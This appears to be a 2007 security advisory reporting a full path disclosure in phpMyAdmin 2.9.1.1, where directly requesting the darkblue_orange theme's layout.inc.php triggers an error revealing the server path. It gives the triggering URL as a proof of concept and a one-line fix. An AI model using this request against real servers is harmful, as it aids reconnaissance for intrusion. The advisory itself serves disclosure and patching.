·= Security Advisory =·

Issue: Remote Inforamtion Discloser Vulnerabilities in "phpMyAdmin".
Discovered Date: 02/01/2007
Author: Tal Argoni. [talargoni at gmail.com]
Product Vendor: http://www.phpmyadmin.net/

Details:

phpMyAdmin is prone to an Information Disclosure.
The vulnerability exists in the "darkblue_orange" visual theme,
caused by the lack of Poor configurations.

By requesting the file
http://www.example.com/phpMyAdmin/themes/darkblue_orange/layout.inc.php
The php return a Fatal error that disclose the full path of
the file on the server.


Exploitation URL:
http://www.example.com/phpMyAdmin/themes/darkblue_orange/layout.inc.php


Vulnerable: phpMyAdmin v2.9.1.1
	    
Solution:

go to line 33 and comment the line.
//$GLOBALS['cfg']['MainBackground']....;

Proof Of Concept:

http://www.example.com/phpMyAdmin/themes/darkblue_orange/layout.inc.php